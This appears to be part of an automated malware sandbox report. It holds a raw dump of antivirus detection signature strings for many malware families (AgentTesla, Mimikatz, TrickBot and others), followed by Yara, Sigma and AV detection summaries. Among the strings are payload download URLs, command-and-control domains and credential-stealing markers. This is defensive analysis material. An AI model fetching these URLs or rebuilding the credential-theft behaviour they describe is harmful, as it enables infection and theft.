Shell CfgInfo failed [-]Read Shell CfgInfo faileda !#ALF:PWS:MSIL/ClipSteal.S!MTB getMSN75Passwords set_CreateNoWindow set_CreateNoWindowa !#ALF:HSTR:DotNET.Packer.S001 CheckRemoteDebugger BitTreeDecoder BitDecoder LzmaDecoder LenDecoder LenDecodera !#HSTR:Trojan:MSIL/AgentTesla.P25!MTB X_X_X_X_A_A_A_A_S_S_S_S CreateInstancea !#HSTR:Virus:Win32/Detnat.F !#ALF:Trojan:Win32/VBKrypt.AY!MTB *;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80 ,&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ,&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyza !#TEL:Adware:Win32/HPDefender.GA!MSR Dnew_Clicker\\SIV\\original\\daemon\\NewClieckerDll\\Release\\SIVUpdate.pdb DwOTsglEzneUiPF DwOTsglEzneUiPFa !#Backdoor:Win32/DBD_A lulzsecpwnsj00 (failed to execute shell (net helpmsg %s) 'connect (tcp): dbd [-options] host port 'connect (tcp): dbd [-options] host porta !PUA:Win32/Softcnapp wuming/png/monids.png dwonload.wencyy.top 8D:\\XiaZaiQi\\ProjectCopy\\Mixed\\pdbmap\\WanNeng\\Install.pdb 8D:\\XiaZaiQi\\ProjectCopy\\Mixed\\pdbmap\\WanNeng\\Install.pdba !#PUA:BundlerCluster:FusionInstall idr_mainframe( reelibrary adprovider=publicitetf adprovider=treasure adprovider=treasurea !#ALF:MSIL:Win32/Mailer d:\\\\dcap.jpg SmtpServer %{PRTSC} cvbcvbcvbcvbcvba d%evirDlacisyhP\\.\\\\ q&d%=diu&? &s%=ltt&d%=diu&etadpu=epyTputes tsoh\\cte\\srevird sys.s%\\s%a !#LowFi:HSTR:VirTool:Win32/VBInject.gen!BP Creating second thread... The time is %s toascii(%#04x) = %c toascii(0x7 !#HSTR:VirTool:MSIL/Obfuscator.DeepSea.A SThis assembly has been obfuscated with an evaluation version of DeepSea Obfuscator. SThis assembly has been obfuscated with an evaluation version of DeepSea Obfuscator.a !#Trojan:Win32/BlofeldCat.G!Lowfi ZGlobal\\{B54E3268-DE1E-4c1e-A667-2596751403AD}a !#AllowList:SimCorp \"SimCorp.XMGRs.Testing.ApiTests.pdb SimCorp.XMGRs.Testing.ApiTests \"SimCorp.XMGRs.Testing.ApiTests.dll \"SimCorp.XMGRs.Testing.ApiTests.dlla !#HSTR:TrojanClicker:Win32/Agent.K ))\t!#HSTR:TrojanClicker:Win32/Agent.K penis pussy teens Lesbian Lesbiana !#HSTR:IntentToEnumAdapters PacketGetAdapterNames pcap_findalldevs GetPerAdapterInfo GetInterfaceInfo GetInterfaceInfoa !#TEL:Backdoor:Win32/Motalium.A!dha $%s?filename=%s&computer=%s&osinfo=%s 2__START_RUNCBTHOOK_MARK__a !#HSTR:bot_threads -%s %s thread stopped. (%d thread(s) stopped.) %s No %s thread found. %s Thread List: %s End of list. %s End of list.a !#HSTR:Program:Win32/WorldAntiSpy.1 worldantispy.com/enter/%u /VERYSILENT /SUPPRESSMSGBOXES worldantispy.com /setup.exe worldantispy.com/setup.exea !#Adware:Win32/180SolutionsSearchAssistant *\\180Solutions\\n-CASE\\ \\180SA /did= \tmodBundle \tmodBundlea !#Lowfi:PUA:BundlerCluster:SoftPulse (install notconfirmed .inet_e_download_failurea !#ALF:Trojan:Win32/Taidoor.PA!MTB A@SvcHostDLL: ServiceMain &SvcHostDLL: RegisterServiceCtrlHandler SvcHostDLL: ServiceMain SvcHostDLL: ServiceMaina !#HSTR:Trojan:Win32/Gordon.B!dha enumcapdev telhelp C:\\windows\\system32\\test.log WinVnc IESOCKET_ACTION_CONNECT failed IESOCKET_ACTION_CONNECT faileda !#ALF:Trojan:Win32/PTASpy.A \\PTASpy\\PTASpy.csv CryptBinaryToStringWa !#Adware:Win32/CloverPlus %WINDOWS\\CloverPlus.cot minisearch.co.kr .php?client=%CLIENTID clover_love %%WINDOWS\\dhid.dh %%WINDOWS\\dhid.dha !#TEL:TrojanSpy:Win32/BBSwift.gen liboradb.dll Module32Next WriteProcessMemorya !#HSTR:Backdoor:Win32/Delf.DU MyDoom PRIVMSG Infectat fucka !#Adware:Win32/ArcadeWebd aj/deactivate.php ArcadeWeb Uninstaller PlaySushi uninstaller arcadeweb32.dll PlaySushi32.DLL PlaySushi32.DLLa 0Microsoft Office Erro ao abrir o arquivo,ou o 0Microsoft OfficeErro ao abrir o arquivo,ou o 1Microsoft Office Falha ao abrir o arquivo ou o 1Microsoft OfficeFalha ao abrir o arquivo ou oa !#HSTR:MSIL/DeflateExec.J!ibt (# ($ p(% s& po' t\t (( o) o* &* zCom.resources zCom.resourcesa !#TEL:Trojan:Win32/Fareit.RM!MTB PrwgK5X54YSOQ7mUdkYsrb6gN8rXOUSGJ7BKbc191a !#HSTR:Torrent:Win32/LimePro Software\\LimePro ares.net/sales/check.php TBitTorrentTransferCreator Make LimePro my default Make LimePro my defaulta !#ALF:PWS:Win32/Engazal.A the lazagne project emf_core.exe emf_run.bat stealer plugin report [ars plugin]: getted hwid: [ars plugin]: getted hwid:a !#ALFPER:Trojan:Win32/Dryvan.M!dha win7load Server.dll ServiceMaina !#SLF:Win32/Manzan!config PayloadUUID Jitter \tKillDate SessionId UserAgent ProxyPassword CallbackHosts CallbackHostsa !#Trojan:Win32/PowerShell.SC!MTB 6 3\\$0S ]3\\$0S D$( % !#TEL:Trojan:Win32/FusionBlaze.C!dha J[injectPE] svcName=%s modulePath=%s| pid=%d tid=%d hModule=0x%p entry=0x%p %s:%d:%s:%d:%d %s:%d:%s:%d:%da !#ALFPER:HSTR:LinkuryInstaller.01 md.xml 0.exe\" -f noah.dat -l -a \\wininit.inia !#HSTR:Virus:Win32/Detnat.E \t\t\t!#HSTR:Virus:Win32/Detnat.E Agent%ld %s%s%d.exe netrun netdat.tmp delphi %s.exe SVCH0ST C:\\Recycled\\ C:\\Recycled\\a !#HSTR:Torrent:Win32/BitTorrent BitTorren btweb.exe router.bittorrent.com torrent_added torrent_pauseda !#BM_WSCRIPT_EXE p#WScript Error - Windows Script Host!Input Error - Windoa !#HSTR:VirTool:Win32/CeeInject.S2 !#ALF:Trojan:Win32/Dermer.A!dha .log.support-news.online 0supports.jumpingcrab.coma !#TEL::MacOS/MetasploitReverseShell.C (j?XH 0meh`v 4amg unamjm )tnc% ostnnh-Y aostA !#HSTR:HackTool:Mikatz_VI SystemFunction005 SystemFunction025 SamEnumerateDomainsInSamServer CryptGetHashParam CryptGetHashParama >WorkProjects\\NetNucleosProjects\\WhereSphere_Rebranding\\gabpath GPFF3Component GPFF3Com.dlla !#HSTR:Exploit:Win32/DouglasTran!dha ![INFO] add user to group fail: %x GuiWAng!@#9bd* [ERR] get import address fail admin$a !#HSTR:Torrent:Win32/Tixati tixati.pdb (Tixati Software Inc. xfer_seedingminutesstop trackersettings_add trackersettings_adda !#Allo *srvCheckresponded.tmpx !#ALF:Trojan:Win32/Turla.SP!dha Projects\\rundll\\x \\Release\\rundll.pdb tasklistw.exe.mui tasklistw.exe Microsoftr Windowsr Operating Systemx !#ALF:Trojan:Win32/Roobing.J!dha 147!@#Asad \\MozillaFirefox\\SystemExtensionsDev\\* \\MozillaFirefox\\Cache\\* task notopen \\generator\\Proj1 \\generator\\Proj1x !#HSTR:Gootripor.A0 pocdpocpdoxxlkala 66697265666F782E657865 6368726F6D652E657865 696578706C6F72652E657865 !#ALF:Trojan:Win32/BlackHole.YP!MTB http://ip.aq138.com/setip.asp C:\\WINDOWS\\SYSTEM32\\inetput.exe HTTP://www.EEEEEEE.EEE C:\\$$a29639$$.batx !#TEL:PhanEvade.ShInj.1 !#ALF:TrojanDownloader:Win32/Numbidea.A!dha HideUpdatePz HideSysUpfile HideSysCmd http://%s/index.htm?id=%4d&content=%s http://%s/index.htm?content=%s&id=%d Software\\Microsoft\\Internet Explorer\\Recovery Software\\Microsoft\\Internet Explorer\\Recoveryx !#Adware:Win32/Kremiumad /c/version.php /c/s.php?p= /c/t.php?old_ad_ids= /_adm/ctrl/info.php /_adm/ctrl/sq.php?m=b&pid= /c/xword /c/xurl /control/deny_target_list !#ALF:Trojan:Win32/Ursnif.RJO!MTB f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wtombenv.c D:\\Project\\C++\\communicator\\Release\\communicator.pdb GetFileType GetCPInfox !#TEL:Trojan:MSIL/Spotealer.KA!MTB config.vdf steal ssfn* Windows Domain Password Credential Windows Domain Certificate Credential Windows Web Password Credential Windows Web Password Credentialx !#ALF:Trojan:MSIL/AgentTesla.CDD!MTB \t\t\t!#ALF:Trojan:MSIL/AgentTesla.CDD!MTB $a1fd0ff7-636c-4e69-bddb-545db9e4245e !#ALF:Trojan:MSIL/FormBook.AQG!MTB \t\t\t!#ALF:Trojan:MSIL/FormBook.AQG!MTB Newtonsoft.Json.dll add_AssemblyResolvex !#HSTR:Trojan:MSIL/AgentTesla.PA5!MTB \t\t\t!#HSTR:Trojan:MSIL/AgentTesla.PA5!MTB HarryPotter HarryPotter.Resources.resources HarryPotter.Resources.resourcesx !#HSTR:Adload_Rofin.A1 download.cpudln.com/ 11/ad209 CmdLine -uid: CmdLine -uid: /fproc UrlNav /fprocUrlNav \\\\.\\SSDTProcess \\\\.\\SSDTProcessHideSys.sys FixTool \\\\.\\FixTool Restore.sys FixTool\\\\.\\FixToolRestore.sys first.exe first.exex !#TEL:Trojan:Win32/AgentTesla.RR!MTB .resources !#TEL:Trojan:MSIL/AgentTesla.OXZ!MTB Delay Delayx !#HSTR:Trojan:Win32/Alureon.gen!N.modules tdlproc.log tdlmain.dll tdll.dll tdllog.dll tdsserrors.log tdssservers.dat tdsslog.dll tdssmain.dll tdssl.dll tdssserv.sys tdssserv.sysx !#HSTR:Program:Win32/LookThisUp LookThisUp Installer -sky signature -eku 1.3.6.1.5.5.7.3.1 -h 1 -cy authority -a sha1 -m 132x !#ALF:HackTool:Win32/BlackboneStrings.A!dha blackbone::NtLdr:: blackbone::Native:: blackbone::Graph:: blackbone::ProcessCore:: blackbone::MMap:: blackbone::RemoteExec:: underground::KernelApi:: underground::KernelApi::x !#HSTR:BingSearchCby \\Release\\DefaultPack.pdb dSoftware\\Microsoft\\Internet Explorer\\SearchScopesx !#HSTR:MSIL/AgentTesla.RR030821_011!MTB Shbhqyuamxzdlbswroomxcz.l.resources Shbhqyuamxzdlbswroomxcz.m.resources Shbhqyuamxzdlbswroomxcz.Properties.Resources.resources Shbhqyuamxzdlbswroomxcz.Ordiyfstfgkqkv.dll Shbhqyuamxzdlbswroomxcz.Ordiyfstfgkqkv.dllx !#ALFPER:HSTR:NirsoftHacktool.A1 \\mailpv.pdb Mail PassView \\PasswordFox.pdb timePasswordChanged, timesUsed FROM moz_logins \"Account\",\"Login Name\",\"Password\",\"Web Site\" $NIRSOFT_IEPV_KEY$ \\NirSoft\\iepv \\NirSoft\\iepvx !#ALF:Trojan:Win32/Zumanek.G!MTB User-Agent: ArmadilloDRM/1.0 \\.\\mailslot\\server\\ C:\\TRANSFER.TXT SMBiosData #SELECT * FROM Win32_OperatingSystem !#HSTR:Trojan:MSIL/AgentTesla.VI94!MTB DownloadData https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll Whttps://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx !#TEL:Trojan:Win32/TrickBotCrypt.MT!MTB \t!#TEL:Trojan:Win32/TrickBotCrypt.MT!MTB DllUnRegisterServer UrlIsNoHistoryA ILCombine ILCombinex !#ALF:Backdoor:Win32/Frocat.A!MTB (*API).Shred (*API).Gomap (*API).Speedtest (*API).Screen (*API).Reconnect (*API).NewHostname (*API).RunCmd (*API).SendFile (*API).RecvFile (*API).GetHardware (*API).GetHardwarex !#ALF:Trojan:MSIL/Spynoon.MFP!MTB $ee14449f-4198-4d2d-83b1-c6e8df42e3f0 %$ee14449f-4198-4d2d-83b1-c6e8df42e3f0 Downloading Opening... System.Net get_Currentx !#HSTR:Trojan:MSIL/AgentTesla.VI35!MTB B Hunterx !#HSTR:Trojan:MSIL/AgentTesla.OXAY!MTB z ZAZAZAZAZZA GetMethodx !#ALFPER:HackTool:MSIL/Gdlogger.A!dha op_In quality gdrivemo nitor.exeH LegalCop yrightCopyrig 2020* !#HSTR:TrojanDownloader:Win32/Banload.gen!B.download .com.br/ /adspostback_server.aspx?userid=%s&source=%s /ws/reportws.asmx?wsdl /api_ajax.ashx?clientid=%sx !#ALFPER:Trojan:Win32/Heriplor.A!dha !#HSTR:Program:Win32/AdGazelle AdGazelle End User License Agreement (EULA) bshow_partner_offershow_partner2_offershow_offerx !#ALF:TrojanDownloader:Win32/Notorgatro.B nrrv<))qqq(uluctpoei Grsgjo|g i&Eihejs STJBiqhjigbRi@ojcG Qohbiqu STJKIH(BJJ Xfak`x|/Nhja{j/B|h N}~zfy`/a /zb/xfa<=/y cfk`. Icn|g_czhfa!jwj Icn|g_czhfa!jwjx !#AllowList:SSHCERT C:\\WINDOWS\\SYSTEM32\\powrprof.dll https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD /usr/local/go/src/runtime/runtime-gdb.py sandcastle232.ash9.facebook.com sandcastle232.ash9.facebook.comx !#AllowList:19a4 alert tls $EXTERNAL_NET any"}Yara Overview |
|---|
Memory Dumps |
|---|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth |
| |
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Coinhive | Yara detected Coinhive miner | Joe Security | ||
| CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth |
| |
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Click to see the 574 entries | ||||
Unpacked PEs |
|---|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| clearlog | Detects Fireball malware - file clearlog.dll | Florian Roth |
| |
| IMPLANT_4_v5 | BlackEnergy / Voodoo Bear Implant by APT28 | US CERT |
| |
| Derusbi_Kernel_Driver_WD_UDFS | Detects Derusbi Kernel Driver | Florian Roth |
| |
| SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth |
| |
| XOR_4byte_Key | Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) | Florian Roth |
| |
| Click to see the 430 entries | ||||
Sigma Overview |
|---|
Networking: |   |
|---|
| Sigma detected: RegAsm connects to smtp port | Show sources | ||
| Source: | Author: Joe Security: | ||
Jbx Signature Overview |
|---|
Click to jump to signature section
Show All Signature Results
AV Detection: | |
|---|
| Antivirus detection for URL or domain | Show sources | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Found malware configuration | Show sources | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | Malware Configuration Extractor: | ||